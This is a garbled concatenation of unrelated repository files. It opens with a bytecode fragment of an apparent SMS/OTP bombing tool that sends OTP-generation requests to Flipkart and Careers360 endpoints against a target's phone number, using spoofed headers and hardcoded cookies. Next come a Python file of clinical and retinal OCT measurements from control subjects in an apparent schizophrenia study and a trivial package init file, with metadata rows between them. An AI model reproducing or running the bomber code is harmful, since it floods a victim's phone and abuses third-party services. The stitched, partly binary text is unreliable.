00\x00\x02\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s.\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x03d\x05i\x01d\x06d\x07d\x08d\t\x9c\x03d\n\x9c\x07}\x00d\x0b|\x00d\x0cf\x03}\x01d\x00S\x00)\rNZ\x08flipkartr\x8e\x00\x00\x00\xda\x07loginIdz0https://www.flipkart.com/api/5/user/otp/generatez\x04+{t}zdMozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktopz\x18https://www.flipkart.comz!application/x-www-form-urlencoded)\x03z\x0cX-user-agentr\x99\x00\x00\x00\xfa\x0cContent-Type)\x07r\xa7\x00\x00\x00r/\x00\x00\x00r\x95\x00\x00\x00Z\tcc_targetr\x1a\x00\x00\x00rR\x00\x00\x00r\x9b\x00\x00\x00z(https://www.flipkart.com/api/5/user/otp/Z\x08generater\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r2\x00\x00\x00\xee\x00\x00\x00s\x1a\x00\x00\x00\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x04\x02\x02\xff\x02\x04\x02\x01\x02\x01\x04\xfd\x06\xf8\x0e\x0cc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x13\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x05d\x06d\x06d\x07d\x08d\td\nd\x0bd\x0cd\rd\x0ed\x0fd\x10d\x11\x9c\x0ed\x12d\x13d\x14d\x15d\x16d\x17d\x18d\x19d\x1ad\x1b\x9c\td\x1cd\x1dd\x1ed\x1f\x9c\x03d \x9c\x07}\x00d!|\x00d"f\x03}\x01d\x00S\x00)#NZ\tcareer360r\x8e\x00\x00\x00z6https://www.careers360.com/ajax/no-cache/user/otp-sendz\x191.1.1168325424.1600579108Z 4584ba1e8345400d92392a88464c9183Z\x1bce35392c174a9f2fbe2f2c29a0cz\x1bGA1.2.1646044729.1600579108z\x1aGA1.2.365026440.1600579108z\x1dfb.1.1600579107930.1446075664z\nHome PagesZ@RI5TGK7tuZdkJjVNzu3lRdSeRcztdtYqfsLmngbNRK1lMH7Uir1qFprpSgCI2ZNyZ`RIeaJ0pgkcvqwRygRT8VTxJ6PrpnRvze6xwTpZBXztsuBXhgRV5OIU97g9s0DivdxwVAHM0DF1teulefRfsK0wCo2MRjp325Z\x06googler\x12\x00\x00\x00Z\r1600579353765z?%7B%22p%22%3A5%2C%22s%22%3A1600579103%2C%22t%22%3A1600579356%7D)\x0eZ\x07_gcl_auZ\x06WZRK_GZ\x05__ascZ\x05__aucZ\x03_gaZ\x04_gidZ\x04_fbpZ\ndataLayer_Z\tcsrftokenZ\x08_omappvpZ\x0eG_ENABLED_IDPSz\x15_dc_gtm_UA-46098128-1Z\x08_omappvsz\x13WZRK_S_654-ZZ4-5Z5ZZ@9tKY96jb358WKiZBMwhz2EcranwljWDbxdqrQCnvqQWXNGbIvtfEQQLCbrzA8ssjr\x97\x00\x00\x00zrMozilla/5.0 (Linux; Android 10; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.101 Mobile Safari/537.36z0application/x-www-form-urlencoded; charset=UTF-8z\x1ahttps://www.careers360.comz\x0bsame-originZ\x04cors\xda\x05emptyz\x84https://www.careers360.com/user/otp-verify/101e8d6e591af6688f640eee08f5a5f8?destination=&click_location=header&google_success=header)\tz\x0bX-CSRFTokenr\x98\x00\x00\x00z\nUser-Agentr\xa8\x00\x00\x00r\x99\x00\x00\x00z\x0eSec-Fetch-Sitez\x0eSec-Fetch-Modez\x0eSec-Fetch-Destr\x9a\x00\x00\x00r\x8f\x00\x00\x00\xda\x04callZ\x0812692588)\x03\xda\rmobile_numberr\x95\x00\x00\x00Z\x03uid)\x07r\xab\x00\x00\x00r/\x00\x00\x00r\x95\x00\x00\x00r\x1a\x00\x00\x00Z\x07cookiesr\x9b\x00\x00\x00rR\x00\x00\x00z.https://www.careers360.com/ajax/no-cache/user/z\x08otp-sendr\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01h\xfc\x00\x00\x00s\x04\x00\x00\x00N\x01\x0e\x01r\xac\x00\x00\x00)\x01\xda\x06targetz\x1fespeak "can , i help u?" -s 120z\x15Can I Help u?[yes/no]Z\x03yes\xda\x01yz*espeak "ok go to telegram , SaD WX" -s 120z\x17ok go to telegram SaDWXz\x1cxdg-open https://t.me/WX_SaDZ\x02no\xda\x01nz%ok please wait for running again toolz\x0epython SBWX.pyz\x0cSaDWX githubz\x0cgo to githubg\x9a\x99\x99\x99\x99\x99\xb9?\xda\x013z"xdg-open https://github.com/WIROUXz.espeak "Do you want to leave the tool?" -s 120z&Do you want to leave the tool?[yes/no]z\x1cespeak "khoda ha fez" -s 120z\x06ok byez+espeak "Do you want to restart too?" -s 120z#Do you want to restart too[yes/no]?z\x15tool running again...z\x15ok wait for exit toolg\x9a\x99\x99\x99\x99\x99\xa9?Z\x03333Z\x0222g{\x14\xaeG\xe1z\x84?)T\xda\x02os\xda\x06system\xda\x03sysrj\x00\x00\x00ru\x00\x00\x00rU\x00\x00\x00r\x03\x00\x00\x00rT\x00\x00\x00\xda\x05unameZ\x04oswxr\n\x00\x00\x00Z\tthreadingr\x0b\x00\x00\x00\xda\x01tZ\x08coloramar\x06\x00\x00\x00r\x0c\x00\x00\x00r(\x00\x00\x00Z\rLIGHTBLACK_EX\xda\x05sleepr-\x00\x00\x00r.\x00\x00\x00Z\rLIGHTGREEN_EXZ\x0fLIGHTMAGENTA_EXr\x07\x00\x00\x00r,\x00\x00\x00r+\x00\x00\x00r*\x00\x00\x00\xda\x05inputr)\x00\x00\x00Z\x02WX\xda\x04node\xda\x07version\xda\x07machineZ\tprocessorZ\x07MAGENTAr7\x00\x00\x00r<\x00\x00\x00\xda\x03strr1\x00\x00\x00r2\x00\x00\x00r5\x00\x00\x00r=\x00\x00\x00rA\x00\x00\x00rD\x00\x00\x00rF\x00\x00\x00rH\x00\x00\x00rJ\x00\x00\x00rO\x00\x00\x00rV\x00\x00\x00rW\x00\x00\x00rY\x00\x00\x00r\\\x00\x00\x00r]\x00\x00\x00r^\x00\x00\x00r`\x00\x00\x00rc\x00\x00\x00rd\x00\x00\x00rf\x00\x00\x00rx\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00r{\x00\x00\x00r|\x00\x00\x00r}\x00\x00\x00r\x7f\x00\x00\x00r\x81\x00\x00\x00r\x83\x00\x00\x00r\x84\x00\x00\x00r\x86\x00\x00\x00r\x87\x00\x00\x00r\x8b\x00\x00\x00r\x8d\x00\x00\x00r\x96\x00\x00\x00r\x9c\x00\x00\x00r\xa0\x00\x00\x00r\xa2\x00\x00\x00r\xa4\x00\x00\x00r\xa6\x00\x00\x00r\xac\x00\x00\x00\xda\x05start\xda\x01q\xda\x04exitZ\x0ekos_nanat_khobr\x08\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\xa4\x04\x00\x00\x08\x01\n\x01\n\x01\n\x01\n\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\n\x01\x08\x01\x0c\x05\x10\x01\x0e\x02\n\x01\n\x01\x0e\x01\n\x01\n\x01\n\x01\n\x01\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x06\xf8\x0e\t\x0e\x01\n\x01\n\x01\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x06\xfe,\x04\n\x01\n\x01\n\x01\x14\x01\x86\x01\n\x01\n\x01\n\x01\n\x01\n\x01\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x06\xf8,\x0b\x08\x01\x0e\x01\x0e\t\x08\t\x08\x05\x08\x05\x08\x04\x08\x04\x08\x04\x08\x04\x08\x04\x08\x04\x08\x05\x08\x05\x08\x05\x08\x05\x08\x06\x08\x04\x08\x04\x08\x04\x08\x04\x08\x05\x08\x07\x08\x05\x08\x04\x08\x04\x08\x03\x08\x04\x08\x04\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x0e\x0e\x03\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x12\x01\x14\x01\n\x01\n\x01\x08\x01\x14\x01\n\x01\x0e\x01\n\x01\x0e\x01\x14\x01\x0e\x01\n\x01\x0e\x01\x04\xfd\x14\x04\n\x01\x0e\x01\x0e\x01\n\x01\x08\x01\n\x01\x08\x01\n\x01\x08\x01\x0e\x01\x14\x01\n\x01\n\x01\x0e\x01\x14\x01\n\x01\n\x01\x0e\x01\n\x01\x14\x01\n\x01\x0e\x01\x14\x01\x0e\x01\n\x01\x0e\x01\x14\x01\n\x01\x0e\x01\n\x01\x0e\x01\n\x01\x0e\x01\n\x01\x0e\x01\n\x01\n\x01\x04\xe6\x04\t\x04\x07'))
"))
| 21,252.666667
| 63,742
| 0.999498
| 27
| 63,758
| 2,360.222222
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098943
| 0.000063
| 63,758
| 2
| 63,743
| 31,879
| 0.900618
| 0
| 0
| 0
| 0
| 0.5
| 0.999341
| 0.999341
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
6906314ed03fc56487dde6feee91b2b5e5493062
| 8,305
|
py
|
Python
|
oct_data/chronic_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
oct_data/chronic_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
oct_data/chronic_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
# Age Sex Race Simp_Race Ethnicity Handedness WTAR_raw WTAR_scaled Corrected_vision OSLogMar ODLogMar BinocularLogMar Education Degree OS_RNFL OS_Cup_Disc_Ratio OS_Cup_Volume OD_RNFL OD_Cup_Disc_Ratio OD_Cup_Volume RNFLsymmetry OS_SUP_value OS_TEM_value OS_INF_value OS_NAS_value OD_SUP_value OD_TEM_value OD_INF_value OD_NAS_value LMac12 LMac3 LMac6 LMac9 RMac12 RMac3 RMac6 RMac9 OS_macula_csf OS_Volume_Cube OS_Thickness_Avg_Cube OD_macula_csf OD_Volume_Cube OD_Thickness_Avg_Cube GCL_IPL_Avg_OS GCL_IPL_Avg_OD
chronic_control_full_clinical = [[46, 1, 5, 1, 2, 1, 34, 101, 2, 0.0, 0.0, 0.0, 15, 3, 98, 0.52, 0.149, 99, 0.50, 0.155, 93, 132, 64, 131, 63, 121, 59, 134, 81, 268, 258, 263, 297, 266, 304, 266, 258, 261, 9.90, 274, 267, 10.00, 278, 79, 80], [49, 2, 5, 1, 2, 1, 49, 123, 2, 0.1, 0.0, 0.0, 19, 5, 94, 0.14, 0.009, 99, 0.08, 0.000, 86, 102, 66, 132, 77, 118, 67, 141, 70, 286, 260, 262, 296, 287, 297, 269, 269, 292, 10.30, 286, 289, 10.30, 287, 78, 79], [56, 2, 5, 1, 2, 2, 27, 92, 1, 0.1, 0.3, 0.0, 18, 4, 102, 0.56, 0.122, 109, 0.54, 0.107, 90, 117, 70, 127, 95, 120, 75, 141, 99, 300, 277, 282, 323, 305, 333, 297, 280, 273, 10.80, 300, 281, 11.10, 308, 84, 87], [49, 1, 5, 1, 2, 1, 42, 113, 2, 0.3, 0.1, 0.1, 17, 4, 87, 0.49, 0.026, 89, 0.57, 0.162, 73, 117, 45, 110, 77, 120, 51, 108, 77, 271, 255, 262, 291, 272, 292, 260, 254, 289, 9.90, 275, 267, 9.90, 276, 76, 77], [45, 1, 5, 1, 1, 1, 46, 119, 1, 0.0, 0.0, -0.1, 17, 4, 86, 0.52, 0.148, 84, 0.47, 0.062, 64, 118, 50, 113, 64, 99, 72, 116, 48, 275, 260, 257, 295, 280, 294, 261, 263, 258, 10.00, 278, 258, 10.10, 280, 83, 84], [32, 1, 5, 1, 2, 1, 41, 113, 2, -0.1, 0.0, -0.1, 19, 6, 86, 0.59, 0.215, 91, 0.50, 0.123, 86, 113, 52, 112, 67, 118, 60, 119, 68, 282, 265, 271, 309, 281, 300, 264, 267, 263, 10.30, 286, 263, 10.20, 282, 82, 81], [38, 1, 5, 1, 1, 1, 32, 98, 2, 0.0, 0.0, -0.1, 17, 4, 106, 0.25, 0.024, 104, 0.43, 0.082, 82, 132, 68, 144, 79, 120, 74, 150, 73, 292, 11, 290, 303, 293, 303, 276, 279, 240, 10.50, 290, 244, 10.40, 290, 88, 88], [39, 1, 5, 1, 2, 2, 41, 111, 1, 0.0, 0.1, -0.1, 17, 4, 100, 0.55, 0.185, 101, 0.59, 0.177, 93, 118, 60, 138, 85, 115, 65, 141, 84, 282, 272, 281, 310, 284, 313, 281, 273, 287, 10.50, 290, 288, 10.80, 293, 88, 88], [32, 1, 5, 1, 1, 1, 33, 100, 2, 0.2, 0.3, 0.2, 19, 5, 84, 0.50, 0.107, 87, 0.54, 0.180, 92, 98, 57, 116, 65, 99, 65, 121, 63, 293, 277, 281, 320, 298, 311, 277, 277, 222, 10.30, 286, 220, 10.40, 288, 84, 85], [30, 1, 5, 1, 2, 1, 40, 111, 1, 0.1, 0.0, 0.0, 16, 3, 78, 0.37, 0.049, 78, 0.44, 0.081, 93, 89, 54, 100, 68, 88, 48, 94, 81, 261, 242, 250, 279, 254, 274, 246, 246, 276, 9.50, 265, 277, 9.50, 263, 71, 71], [30, 1, 5, 1, 2, 1, 45, 119, 2, -0.2, 0.1, -0.1, 18, 4, 94, 0.48, 0.068, 96, 0.48, 0.103, 90, 100, 61, 133, 80, 95, 63, 133, 92, 305, 293, 296, 328, 304, 326, 293, 292, 270, 11.10, 309, 268, 11.10, 308, 92, 91], [31, 1, 5, 1, 1, 2, 47, 122, 2, -0.1, -0.2, -0.2, 15, 1, 95, 0.67, 0.412, 102, 0.60, 0.235, 86, 131, 58, 110, 79, 132, 63, 126, 89, 294, 270, 285, 320, 301, 321, 275, 272, 287, 10.70, 296, 264, 10.60, 295, 89, 89], [31, 1, 2, 2, 2, 1, 40, 111, 1, 0.0, 0.1, 0.0, 19, 5, 98, 0.34, 0.038, 97, 0.39, 0.055, 92, 143, 60, 131, 56, 122, 62, 143, 62, 271, 262, 255, 294, 266, 295, 257, 262, 252, 9.90, 276, 254, 10.00, 277, 83, 82], [33, 1, 3, 2, 2, 1, 32, 98, 2, -0.1, -0.1, -0.1, 13, 1, 95, 0.63, 0.276, 96, 0.57, 0.153, 95, 123, 59, 130, 70, 122, 59, 127, 75, 282, 266, 266, 302, 286, 309, 267, 271, 266, 10.10, 280, 272, 10.30, 285, 90, 89], [31, 1, 6, 2, 2, 1, 41, 113, 1, 0.3, 0.3, 0.3, 15, 1, 64, 0.50, 0.080, 63, 0.61, 0.170, 80, 80, 38, 85, 54, 80, 39, 77, 57, 256, 255, 258, 276, 258, 282, 257, 253, 310, 9.60, 268, 313, 9.70, 270, 68, 68], [61, 1, 5, 1, 2, 1, 43, 116, 1, 0.3, 0.1, 0.0, 19, 5, 88, 0.50, 0.082, 93, 0.42, 0.050, 88, 121, 51, 112, 69, 119, 57, 122, 73, 289, 274, 279, 311, 289, 307, 282, 271, 265, 10.50, 292, 263, 10.50, 292, 85, 85], [65, 2, 5, 1, 2, 1, 38, 108, 1, 0.1, 0.1, 0.1, 14, 1, 93, 0.54, 0.144, 38, 0.37, 0.000, -30, 122, 59, 131, 61, 33, 43, 37, 37, 272, 263, 273, 294, 274, 293, 266, 264, 247, 10.10, 280, 251, 10.10, 280, 82, 82], [56, 1, 5, 1, 2, 1, 49, 125, 1, 0.1, 0.1, 0.0, 22, 6, 76, 0.22, 0.012, 88, 0.18, 0.008, 86, 75, 43, 120, 66, 105, 51, 125, 70, 278, 261, 256, 289, 278, 300, 268, 267, 283, 10.10, 280, 287, 10.30, 287, 74, 81]]
chronic_control_clinical_only = [[46, 1, 5, 1, 2, 1, 34, 101, 2, 0.0, 0.0, 0.0, 15, 3], [49, 2, 5, 1, 2, 1, 49, 123, 2, 0.1, 0.0, 0.0, 19, 5], [56, 2, 5, 1, 2, 2, 27, 92, 1, 0.1, 0.3, 0.0, 18, 4], [49, 1, 5, 1, 2, 1, 42, 113, 2, 0.3, 0.1, 0.1, 17, 4], [45, 1, 5, 1, 1, 1, 46, 119, 1, 0.0, 0.0, -0.1, 17, 4], [32, 1, 5, 1, 2, 1, 41, 113, 2, -0.1, 0.0, -0.1, 19, 6], [38, 1, 5, 1, 1, 1, 32, 98, 2, 0.0, 0.0, -0.1, 17, 4], [39, 1, 5, 1, 2, 2, 41, 111, 1, 0.0, 0.1, -0.1, 17, 4], [32, 1, 5, 1, 1, 1, 33, 100, 2, 0.2, 0.3, 0.2, 19, 5], [30, 1, 5, 1, 2, 1, 40, 111, 1, 0.1, 0.0, 0.0, 16, 3], [30, 1, 5, 1, 2, 1, 45, 119, 2, -0.2, 0.1, -0.1, 18, 4], [31, 1, 5, 1, 1, 2, 47, 122, 2, -0.1, -0.2, -0.2, 15, 1], [31, 1, 2, 2, 2, 1, 40, 111, 1, 0.0, 0.1, 0.0, 19, 5], [33, 1, 3, 2, 2, 1, 32, 98, 2, -0.1, -0.1, -0.1, 13, 1], [31, 1, 6, 2, 2, 1, 41, 113, 1, 0.3, 0.3, 0.3, 15, 1], [61, 1, 5, 1, 2, 1, 43, 116, 1, 0.3, 0.1, 0.0, 19, 5], [65, 2, 5, 1, 2, 1, 38, 108, 1, 0.1, 0.1, 0.1, 14, 1], [56, 1, 5, 1, 2, 1, 49, 125, 1, 0.1, 0.1, 0.0, 22, 6]]
chronic_control_oct_only = [[98, 0.52, 0.149, 99, 0.5, 0.155, 93, 132, 64, 131, 63, 121, 59, 134, 81, 268, 258, 263, 297, 266, 304, 266, 258, 261, 9.9, 274, 267, 10.0, 278, 79, 80], [94, 0.14, 0.009, 99, 0.08, 0.0, 86, 102, 66, 132, 77, 118, 67, 141, 70, 286, 260, 262, 296, 287, 297, 269, 269, 292, 10.3, 286, 289, 10.3, 287, 78, 79], [102, 0.56, 0.122, 109, 0.54, 0.107, 90, 117, 70, 127, 95, 120, 75, 141, 99, 300, 277, 282, 323, 305, 333, 297, 280, 273, 10.8, 300, 281, 11.1, 308, 84, 87], [87, 0.49, 0.026, 89, 0.57, 0.162, 73, 117, 45, 110, 77, 120, 51, 108, 77, 271, 255, 262, 291, 272, 292, 260, 254, 289, 9.9, 275, 267, 9.9, 276, 76, 77], [86, 0.52, 0.148, 84, 0.47, 0.062, 64, 118, 50, 113, 64, 99, 72, 116, 48, 275, 260, 257, 295, 280, 294, 261, 263, 258, 10.0, 278, 258, 10.1, 280, 83, 84], [86, 0.59, 0.215, 91, 0.5, 0.123, 86, 113, 52, 112, 67, 118, 60, 119, 68, 282, 265, 271, 309, 281, 300, 264, 267, 263, 10.3, 286, 263, 10.2, 282, 82, 81], [106, 0.25, 0.024, 104, 0.43, 0.082, 82, 132, 68, 144, 79, 120, 74, 150, 73, 292, 11, 290, 303, 293, 303, 276, 279, 240, 10.5, 290, 244, 10.4, 290, 88, 88], [100, 0.55, 0.185, 101, 0.59, 0.177, 93, 118, 60, 138, 85, 115, 65, 141, 84, 282, 272, 281, 310, 284, 313, 281, 273, 287, 10.5, 290, 288, 10.8, 293, 88, 88], [84, 0.5, 0.107, 87, 0.54, 0.18, 92, 98, 57, 116, 65, 99, 65, 121, 63, 293, 277, 281, 320, 298, 311, 277, 277, 222, 10.3, 286, 220, 10.4, 288, 84, 85], [78, 0.37, 0.049, 78, 0.44, 0.081, 93, 89, 54, 100, 68, 88, 48, 94, 81, 261, 242, 250, 279, 254, 274, 246, 246, 276, 9.5, 265, 277, 9.5, 263, 71, 71], [94, 0.48, 0.068, 96, 0.48, 0.103, 90, 100, 61, 133, 80, 95, 63, 133, 92, 305, 293, 296, 328, 304, 326, 293, 292, 270, 11.1, 309, 268, 11.1, 308, 92, 91], [95, 0.67, 0.412, 102, 0.6, 0.235, 86, 131, 58, 110, 79, 132, 63, 126, 89, 294, 270, 285, 320, 301, 321, 275, 272, 287, 10.7, 296, 264, 10.6, 295, 89, 89], [98, 0.34, 0.038, 97, 0.39, 0.055, 92, 143, 60, 131, 56, 122, 62, 143, 62, 271, 262, 255, 294, 266, 295, 257, 262, 252, 9.9, 276, 254, 10.0, 277, 83, 82], [95, 0.63, 0.276, 96, 0.57, 0.153, 95, 123, 59, 130, 70, 122, 59, 127, 75, 282, 266, 266, 302, 286, 309, 267, 271, 266, 10.1, 280, 272, 10.3, 285, 90, 89], [64, 0.5, 0.08, 63, 0.61, 0.17, 80, 80, 38, 85, 54, 80, 39, 77, 57, 256, 255, 258, 276, 258, 282, 257, 253, 310, 9.6, 268, 313, 9.7, 270, 68, 68], [88, 0.5, 0.082, 93, 0.42, 0.05, 88, 121, 51, 112, 69, 119, 57, 122, 73, 289, 274, 279, 311, 289, 307, 282, 271, 265, 10.5, 292, 263, 10.5, 292, 85, 85], [93, 0.54, 0.144, 38, 0.37, 0.0, -30, 122, 59, 131, 61, 33, 43, 37, 37, 272, 263, 273, 294, 274, 293, 266, 264, 247, 10.1, 280, 251, 10.1, 280, 82, 82], [76, 0.22, 0.012, 88, 0.18, 0.008, 86, 75, 43, 120, 66, 105, 51, 125, 70, 278, 261, 256, 289, 278, 300, 268, 267, 283, 10.1, 280, 287, 10.3, 287, 74, 81]]
# clinical_only = []
# for i in chronic_control_full_clinical:
# clinical_only.append(i[14:])
# print(clinical_only)
| 692.083333
| 3,825
| 0.542926
| 2,070
| 8,305
| 2.145894
| 0.137198
| 0.027015
| 0.022963
| 0.016209
| 0.70959
| 0.70959
| 0.700585
| 0.683926
| 0.683926
| 0.670419
| 0
| 0.587417
| 0.203853
| 8,305
| 12
| 3,826
| 692.083333
| 0.084392
| 0.075256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
15fb86732c045d614eba1d2b4771f226713ef7a2
| 80
|
py
|
Python
|
qmath/__init__.py
|
qzfzz/qmath
|
868ddb35a485725a42a5049e75785d9aa0bfcf52
|
[
"MIT"
] | null | null | null |
qmath/__init__.py
|
qzfzz/qmath
|
868ddb35a485725a42a5049e75785d9aa0bfcf52
|
[
"MIT"
] | null | null | null |
qmath/__init__.py
|
qzfzz/qmath
|
868ddb35a485725a42a5049e75785d9aa0bfcf52
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
# coding:utf-8
def start():
print('import successful')
| 11.428571
| 30
| 0.65
| 11
| 80
| 4.727273
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.175
| 80
| 6
| 31
| 13.333333
| 0.757576
| 0.375
| 0
| 0
| 0
| 0
| 0.354167
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
